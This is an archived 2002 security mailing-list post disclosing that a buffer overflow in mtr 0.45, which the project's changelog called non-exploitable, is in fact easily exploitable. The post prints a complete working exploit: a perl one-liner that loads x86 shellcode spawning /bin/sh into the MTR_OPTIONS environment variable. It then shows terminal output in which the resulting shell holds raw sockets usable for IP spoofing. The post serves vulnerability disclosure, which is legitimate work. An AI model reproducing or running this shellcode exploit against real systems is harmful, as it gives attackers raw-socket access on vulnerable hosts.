OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Przemyslaw Frasunek (venglinfreebsd.lublin.pl)
Date: Wed Mar 06 2002 - 08:41:43 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Few days ago, a new version of mtr has been released. Authors wrote
    in CHANGELOG, that they fixed a non-exploitable buffer overflow.
    In fact, this vulnerability is very easly exploitable and allows
    attacker to gain access to raw socket, which makes possible ip spoofing
    and other malicious network activity.

    The sample exploit is TRIVIAL because of strtok/while loop in vulnerable code.

    clitoris:/home/venglin/mtr-0.45> uname -smr
    Linux 2.4.8-26mdk i686
    clitoris:/home/venglin/mtr-0.45> setenv MTR_OPTIONS `perl -e 'print "A "x130 . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`
    clitoris:/home/venglin/mtr-0.45> ./mtr
    sh-2.05$

    At this point, exec'd shell has a raw socket opened:

    clitoris:/home/venglin/mtr-0.45> /usr/sbin/lsof | grep raw
    sh 17263 venglin 3u raw 605400 00000000:00FF->00000000:0000 st=07
    sh 17263 venglin 4u raw 605401 00000000:0001->00000000:0000 st=07
    sh-2.05$ ls -la /proc/self/fd/
    total 0
    dr-x------ 2 venglin venglin 0 Mar 6 15:40 .
    dr-xr-xr-x 3 venglin venglin 0 Mar 6 15:40 ..
    lrwx------ 1 venglin venglin 64 Mar 6 15:40 0 -> /dev/pts/6
    lrwx------ 1 venglin venglin 64 Mar 6 15:40 1 -> /dev/pts/6
    lrwx------ 1 venglin venglin 64 Mar 6 15:40 2 -> /dev/pts/6
    lrwx------ 1 venglin venglin 64 Mar 6 15:40 3 -> socket:[605400]
    lrwx------ 1 venglin venglin 64 Mar 6 15:40 4 -> socket:[605401]
    lr-x------ 1 venglin venglin 64 Mar 6 15:40 5 -> /proc/17318/fd

    -- 
    * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
    * Inet: przemyslawfrasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *